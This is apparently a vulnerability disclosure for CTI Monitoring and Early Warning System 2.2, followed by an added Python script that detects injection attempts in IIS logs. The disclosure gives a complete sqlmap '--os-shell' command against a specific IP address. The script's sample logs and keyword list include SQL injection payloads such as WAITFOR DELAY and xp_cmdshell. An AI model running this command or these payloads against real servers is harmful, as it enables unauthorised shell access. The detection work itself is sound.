rce.md


There is a command execution vulnerability in CTI Monitoring and Early Warning System 2.2.

Version: v2.2

At the path /Web/SysManage/UserEdit.aspx?&ID=0, sqlmap can be used to carry out time-based (delayed) SQL injection, obtain a shell, and execute commands.

sqlmap command: python.exe sqlmap.py -u "http://110.167.122.134:9900/Web/SysManage/UserEdit.aspx?&ID=0" --os-shell --batch

The injection exists (screenshot).

Write the shell and execute the whoami command (screenshot).
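Requests like the one described above leave traces in the web server's access log. The following is an added detection example, not part of the original advisory: it scans IIS W3C extended logs for injection attempts against the affected page. The log field layout, the sample lines, the keyword list, the integer-only ID rule and the 5-second threshold are all assumptions of this example.

```python
import re
from urllib.parse import unquote_plus

TARGET = "/web/sysmanage/useredit.aspx"  # path from the advisory, lower-cased
# Assumed signatures: common delay, stacked-query and command-execution SQLi keywords.
SQLI = re.compile(r"waitfor\s+delay|sleep\s*\(|pg_sleep|benchmark\s*\(|xp_cmdshell|union\s+select", re.I)
SLOW_MS = 5000  # assumption: delay used by time-based probes, in milliseconds

# Constructed sample in IIS W3C extended format (documentation IP addresses).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query cs(User-Agent) sc-status time-taken
2024-01-01 10:00:00 192.0.2.10 GET /Web/SysManage/UserEdit.aspx ID=12 Mozilla/5.0 200 48
2024-01-01 10:00:05 198.51.100.7 GET /Web/SysManage/UserEdit.aspx &ID=0%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- sqlmap/1.7#stable 200 5031
2024-01-01 10:00:09 198.51.100.7 GET /Web/SysManage/UserEdit.aspx ID=0%27%20AND%20%271%27%3D%271 Mozilla/5.0 500 20
2024-01-01 10:00:12 192.0.2.10 GET /Web/Default.aspx - Mozilla/5.0 200 15
"""

def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def reasons(entry):
    """Return why a request to the affected page looks like an injection attempt."""
    if entry["cs-uri-stem"].lower() != TARGET:
        return []
    found = ["sqlmap user agent"] if "sqlmap" in entry["cs(User-Agent)"].lower() else []
    pairs = (p.partition("=") for p in entry["cs-uri-query"].split("&"))
    for value in (unquote_plus(v) for n, _, v in pairs if n.lower() == "id"):
        if not re.fullmatch(r"[0-9]+", value):  # assumption: a legitimate ID is an integer
            found.append("non-numeric ID")
        if SQLI.search(value):
            found.append("SQLi keyword")
            if int(entry["time-taken"]) >= SLOW_MS:
                found.append("delayed response")
    return found

def scan(text):
    """Map (time, client IP) to the reasons for every flagged request."""
    return {(e["time"], e["c-ip"]): r for e in parse_w3c(text) if (r := reasons(e))}

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A hit that combines an SQLi keyword with a delayed response is the strongest signal, since it indicates the injected delay actually executed on the database.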